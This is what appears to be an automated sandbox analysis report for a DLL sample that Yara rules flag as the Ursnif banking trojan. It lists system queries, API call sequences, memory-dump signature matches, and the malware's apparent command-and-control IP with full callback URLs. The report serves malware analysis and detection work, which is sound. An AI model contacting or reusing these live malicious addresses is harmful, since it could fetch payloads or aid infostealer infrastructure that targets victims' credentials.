Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_01C15F8B cpuid

1_2_01C15F8B

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_046CDB44 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,

1_2_046CDB44

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_01C130FD GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

1_2_01C130FD

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_01C13807 GetVersion,GetLastError,

1_2_01C13807

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_01C15F8B RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

1_2_01C15F8B

Stealing of Sensitive Information

Yara detected Ursnif

Source: Yara match	File source: 00000005.00000003.311254885.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.365747529.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318724371.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.461557697.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.319004486.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.463004006.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.313620006.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318536421.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.461902284.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318886527.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.310802933.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.419223881.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318950101.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318813278.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.357803374.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.416632245.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.360636522.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.462719900.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.311195582.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.310405280.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.424590800.0000000006248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.310678862.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.313789835.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.416948546.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.357904969.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.310826841.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.311031834.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.462876303.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.311387225.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.418907434.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.310564493.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.311048648.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.311384342.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.418190503.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.418488620.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318621591.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.313081553.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.312190736.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.310688564.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.358039219.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.311319683.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.310571881.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.461973969.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.419037087.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.310907059.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.359673745.0000000001F7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.312479873.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.370947214.000000000540C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.360822217.000000000536C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.416181802.0000000006078000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.319064007.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.463098635.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.310393039.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.313276698.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.313441363.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.312864720.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.416179066.00000000064A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.461743717.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.419113309.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6248, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6100, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4768, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5376, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 3360, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 3088, type: MEMORYSTR

Remote Access Functionality

Yara detected Ursnif

Source: Yara match	File source: 00000005.00000003.311254885.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.365747529.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318724371.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.461557697.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.319004486.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.463004006.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.313620006.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318536421.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.461902284.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318886527.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.310802933.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.419223881.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318950101.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318813278.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.357803374.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.416632245.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.360636522.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.462719900.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.311195582.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.310405280.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.424590800.0000000006248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.310678862.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.313789835.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.416948546.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.357904969.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.310826841.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.311031834.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.462876303.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.311387225.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.418907434.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.310564493.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.311048648.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.311384342.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.418190503.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.418488620.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318621591.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.313081553.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.312190736.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.310688564.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.358039219.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.311319683.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.310571881.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.461973969.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.419037087.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.310907059.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.359673745.0000000001F7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.312479873.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.370947214.000000000540C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.360822217.000000000536C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.416181802.0000000006078000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.319064007.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.463098635.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.310393039.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.313276698.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.313441363.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.312864720.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.416179066.00000000064A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.461743717.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.419113309.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6248, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6100, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4768, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5376, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 3360, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 3088, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
194.76.226.200	unknown	Germany		39378	SERVINGADE	true

Private

IP
192.168.2.1

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://194.76.226.200/drew/S0hO4k1kNWmaIbAIKk6J/C6ltlnn67F9zU4319Wq/SHohWMCDfW7oiPhqwsiIKI/bmU8FVW7oRmBm/mR3BXgY_/2FBwUjw6HBJfko8dOlgJjVp/0AJ_2FHS_2/F6As3DqY8qnvNETrK/YeXgHXybA3MO/9wS_2FpxfKh/va60IJVV7f3myC/lkXy0Vd4C9gsuVelNEUUO/TZ36G6O4b_2Br5X5/Ty9Sl6i_2F9Ot_2/Fw5KU6KNbXI13KA_2B/fSlw9uxRZ/1GDQy2uvqr3Bg6MoNgQy/Xe_2F1.jlk	true	Avira URL Cloud: safe	unknown
http://194.76.226.200/drew/m0QZKcj4ankL3W/8FVzGu6iQpcBkrTN5v3eZ/A6WzaqZBs9gogbdq/m8YEYG_2B_2FLSM/NM7eY2w3b1aL2aX8An/zJ6Vy7aKV/77q51XwDss_2Bne92xk6/rrRqhSV7rhVbP2hjU6R/_2B0H8cg3MM0IyieU8GPC9/gTwDi0Qx4J0HW/gyC_2FqL/iUkABk5euk2dlDO3ecBxilL/xQJUPbO4iF/9AhmuI174lSXWne_2/Fo5eEhaaDB/xKb9szQ5MHJ/1.jlk	true	Avira URL Cloud: safe	unknown
http://194.76.226.200/drew/q2MoEGVRNe15Nk60/LDrmU6_2F0GkU3d/_2F0Knrw_2BLeOfpGj/fbCS28O8a/HzEmaSZQ4r2vrrl3ds_2/FJYs8ohc9ZfX55MptAq/LUXti_2BtVHZBpG5bp31OD/nUDVndp9HwGDI/fdApFg3Y/hh5zxa6uVZWdnbZZ4Zw497E/am4BWYNw05/CiWFAq8EmF0WMEY2m/vQZOFYV25Mfi/UplJo0Tr14k/U65NpQlAx9OU47/ZEIy4h_2BMYYm16tA/UAd.jlk	true	Avira URL Cloud: safe	unknown
http://194.76.226.200/drew/qj8KFpDyUAB/xQ_2FW_2FRVQUR/xo7UR19sTv1fTteFGwviu/H1QAugjBS9BAganl/OqUmHFdTh92Mttp/bKzDAO3E0N_2BxZ1ow/sTpBKLA2p/6BUrMhtfsbHTEuRLWcq7/jTbARM2BAFwOLbLtYBa/i_2BLCetjq8jqUWnEo5XCb/sLP1ktID7e6VC/G3BV6Vkb/N29_2BJlXZ2HReVfDXYWlEP/mt9DueL_2F/NgPtBNn5wZiJtUInd/fWiE7TY0/hCY.jlk	true	Avira URL Cloud: safe	unknown
http://194.76.226.200/drew/GVxzdEn3rJxHPgJaE/ckcbKS4onbSJ/ZdlWFtgOHAM/pJGsS1vTtWNP8h/yNsXRCxcvAA6AXQPJwabF/oYnH6redQswcAwtL/rDlMsMT_2FoiQ_2/BdNrJdcFdtJq9vsrPj/Pi_2B3_2B/dnsHU70OV9c4KUJyE_2F/0ip_2FIZ7Wqza0Ho2lN/KYodlnq6PG5KK9SBFWXHj5/viPS4jjPVWzpA/_2B2JOAM/KOBPUpSnsG9auoSxo_2BhjX/PvM1mRJl_2/FaBIYOp1w1wVY3Kqd/ZfinCIlH/i.jlk	true	Avira URL Cloud: safe	unknown
http://194.76.226.200/drew/F2DN_2FU1e/fQ5u04QtqSS_2Fpez/wjKfLKebrhaF/MMToBjmjMxS/2NhI76XoCH_2F5/14TeSntbngCZZYLUNIrhm/x6MB8tXx2hU99kkL/VY0QQM3MDv5NCL1/6ydwr5AoPHPZyujorj/zsR7mWAsu/Dgwxr2J_2Bt6yrRwZsuj/G0YF7iDIM95RsJq2szP/8WMC9D3LjonMIPvdKF1kRz/NQS_2FA_2BozQ/hVadPzcD/tG9pjaS8y_2BWqM0wQM2d5M/W.jlk	true	Avira URL Cloud: safe	unknown
http://194.76.226.200/drew/SzHdMdWvg/8JrkfhvX1ImoPdiWmQP6/QNbELOUZkV6PJ_2F_2B/T_2FBOZzzLom_2BccXK2f_/2B4napL_2F34z/ZunofQOB/e8FUQk93KOWF2nr5L7lasmZ/NJz0CTr65M/vqC70qv5uFkSE3WWV/uzLbKezipUQb/EiDVCVAB9rI/YTJRJOijIzHReN/lOWZ3chpUTxk47un6IsE8/fGRw3zIlPFEXwpmw/KXHYTQF2fkI3XOU/3s8f8mWLipjSZC2MeH/eanpmASqD48wQWqOn/qyD.jlk	true	Avira URL Cloud: safe	unknown
http://194.76.226.200/drew/HzhM5fP5x43l7rSkYr8Y/jYk_2FxetzKCt9WlQ60/DHr3pyDc_2BukVZ7K3nBXi/MEA2Xn3fXlFfO/GgBWR09O/Z1DKEGLlegReZBua8Nnmy16/fhqdF_2Beg/hrDVYSGiYpSkF5kA7/KsGOnRLVKqBx/xsw07jdGhl6/opBuLWprNFNT7s/OVJpMrjpCjISLpLDnGaGt/ixsS7exYYQrwdM8F/_2FgW9_2FjtCahO/8Yp45dJrj8Sd2mVa6W/QapGna.jlk	true	Avira URL Cloud: safe	unknown
http://194.76.226.200/drew/2f3T6_2Fldpw_2BA6Engti/ap9anBYrptHHy/xCGyvO5i/wYPccsVOVAKMkuNvsUxMYE4/RkZB4YqLqe/XacN1M_2FaB24Ib2R/hVRxOozHufuZ/c6WQY_2FOGu/wQlIyAdYSezuQl/ojNT2IxdKraylKm035Q_2/FdvJBuYlSvhCsegR/oboSzu_2BtJ_2BW/XMLPOefEKMYQuO_2B_/2FNWtFwdl/dQERZJKq6wr_2FxRn8R5/MLhj_2Fz9ge97_2BBFz/rUr1Agrx59/b.jlk	true	Avira URL Cloud: safe	unknown

AV Detection

Machine Learning detection for sample

Source: 61f113091fd0c.dll

Joe Sandbox ML: detected

Cryptography

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_01C178F2 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,	1_2_01C178F2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_031F78F2 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,	3_2_031F78F2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010578F2 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,	5_2_010578F2

Compliance

Uses 32bit PE files

Source: 61f113091fd0c.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source:	Binary string: ntdll.pdb source: loaddll32.exe, 00000001.00000003.455695462.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.440284992.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.454013508.0000000006360000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.435436816.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.429285803.00000000064C0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.439095932.0000000006110000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000001.00000003.455695462.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.440284992.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.454013508.0000000006360000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.435436816.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.429285803.00000000064C0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.439095932.0000000006110000.00000004.00000800.00020000.00000000.sdmp

